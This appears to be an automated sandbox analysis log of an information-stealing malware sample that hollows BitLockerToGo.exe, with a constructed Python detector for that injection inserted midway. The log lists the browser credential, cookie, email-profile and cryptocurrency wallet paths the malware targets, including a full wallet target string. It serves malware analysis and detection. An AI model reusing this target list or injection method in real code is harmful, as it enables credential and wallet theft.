Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1839715866.00000000008EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareq
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API call chain: ExitProcess graph end node
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information queried: ProcessInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0276B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0276B33A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_027545C0 VirtualProtect ?,00000004,00000100,00000000 1_2_027545C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_02769860
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769750 mov eax, dword ptr fs:[00000030h] 1_2_02769750
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02760250 strtok_s,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,StrStrA,lstrlen,StrStrA,lstrlen,StrStrA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,strtok_s,lstrlen,memset, 1_2_02760250
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0276CEEA SetUnhandledExceptionFilter, 1_2_0276CEEA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0276B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0276B33A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0276AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0276AD48
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C82B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_6C82B66C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C82B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6C82B1F7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C9DAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6C9DAC62
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe PID: 2140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2750000 protect: page execute and read and write
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2750000 value starts with: 4D5A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02769600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_02769600
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 501008
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2750000
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2751000
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 276E000
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 277B000
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 29AC000
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
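The allocate-then-write sequence above (an execute/read/write region reserved at base 2750000 inside the freshly created BitLockerToGo.exe, a PE header written to that base, then further writes including one at 501008 that lies outside that region) is the shape of a process-hollowing style injection into a legitimate Microsoft binary. What follows is an added example, not code from the report or from the sample: a small detector that replays such behaviour events and raises a finding when one process allocates executable memory in another process and then writes an MZ header to that same base. The event list is constructed to mirror the observations above (the report orders lines by signature, so the process-creation line is listed last there); the event schema, the benign control events and the reading of the 501008 write as a PEB patch are assumptions.

```python
"""Flag foreign executable allocation followed by a PE write (added example)."""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import List, Optional

PE_MAGIC = "4D5A"  # "MZ": the first bytes the sandbox saw at the injected base
LOADER = "5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe"
HOST = "BitLockerToGo.exe"


@dataclass
class Event:
    source: str                  # process performing the operation
    op: str                      # process_created | memory_allocated | memory_written
    target: str                  # process being operated on
    base: Optional[int] = None   # address inside the target, if any
    detail: str = ""             # protection for allocations, leading bytes (hex) for writes


@dataclass
class Finding:
    source: str
    target: str
    base: int
    protection: str
    spawned_by_source: bool
    other_writes: List[int] = field(default_factory=list)  # writes outside the injected base


# Constructed event log modelled on the sandbox lines above (assumption: one
# allocation, then the writes in the order the report lists them).
SAMPLE_EVENTS = [
    Event(LOADER, "process_created", HOST),
    Event(LOADER, "memory_allocated", HOST, 0x2750000, "page execute and read and write"),
    Event(LOADER, "memory_written", HOST, 0x2750000, "4D5A"),
    # 0x501008 is outside the RWX region. Patching the child's PEB
    # ImageBaseAddress (PEB+8 on 32-bit) is the classic hollowing step, but the
    # report does not show what was written there, so it is only counted here.
    Event(LOADER, "memory_written", HOST, 0x501008),
    Event(LOADER, "memory_written", HOST, 0x2751000),
    Event(LOADER, "memory_written", HOST, 0x276E000),
    Event(LOADER, "memory_written", HOST, 0x277B000),
    Event(LOADER, "memory_written", HOST, 0x29AC000),
    # Constructed benign control: a non-executable cross-process patch must not trigger.
    Event("tool.exe", "memory_allocated", "notepad.exe", 0x400000, "page read and write"),
    Event("tool.exe", "memory_written", "notepad.exe", 0x400000, "00FF"),
]


def detect_pe_injection(events: List[Event]) -> List[Finding]:
    """One Finding per (source, target, base) where an executable allocation in a
    foreign process is later written with an MZ header by the same source."""
    exec_allocs = {}              # (src, tgt, base) -> protection string, seen so far
    spawned = set()               # (src, tgt) pairs where src created tgt
    writes = defaultdict(list)    # (src, tgt) -> [base, ...]
    findings = {}
    for ev in events:
        pair = (ev.source, ev.target)
        if ev.op == "process_created":
            spawned.add(pair)
        elif ev.op == "memory_allocated":
            if ev.source != ev.target and "execute" in ev.detail.lower():
                exec_allocs[(ev.source, ev.target, ev.base)] = ev.detail
        elif ev.op == "memory_written":
            writes[pair].append(ev.base)
            key = (ev.source, ev.target, ev.base)
            # Order matters: the executable allocation must precede the PE write.
            if key in exec_allocs and key not in findings \
                    and ev.detail.upper().startswith(PE_MAGIC):
                findings[key] = Finding(ev.source, ev.target, ev.base,
                                        exec_allocs[key], pair in spawned)
    for (src, tgt, base), f in findings.items():
        f.spawned_by_source = (src, tgt) in spawned
        f.other_writes = sorted(b for b in set(writes[(src, tgt)])
                                if b is not None and b != base)
    return list(findings.values())


if __name__ == "__main__":
    for f in detect_pe_injection(SAMPLE_EVENTS):
        print(f"{f.source} -> {f.target}: PE written to {f.base:#x} ({f.protection}); "
              f"child spawned by source: {f.spawned_by_source}; "
              f"other writes: {[hex(b) for b in f.other_writes]}")
```

The extra writes outside the injected image are reported alongside the finding rather than suppressed: on a real EDR feed they are what distinguishes a hollowed host (PEB and entry-point patching) from a plain shellcode injection, and they are worth keeping in the alert for the analyst.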
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C82B341 cpuid 1_2_6C82B341
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 1_2_02767B90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Queries volume information: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe VolumeInformation
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02768B60 GetSystemTime, 1_2_02768B60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02767850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 1_2_02767850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02767A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 1_2_02767A30

Stealing of Sensitive Information

Source: Yara match File source: 1.2.BitLockerToGo.exe.2750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.2750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1842034533.00000000021D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.000000000227A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.00000000023CA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000000.1681656576.00000000014D5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: #github.com/ethereum/go-ethereum/rlp
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: 00000001.00000002.2061952905.0000000002A16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 1.2.BitLockerToGo.exe.2750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.2750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1842034533.00000000021D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.000000000227A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1843071659.00000000023CA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2061952905.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 2736, type: MEMORYSTR
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C9E0C40 sqlite3_bind_zeroblob, 1_2_6C9E0C40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C9E0D60 sqlite3_bind_parameter_name, 1_2_6C9E0D60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C908EA0 sqlite3_clear_bindings, 1_2_6C908EA0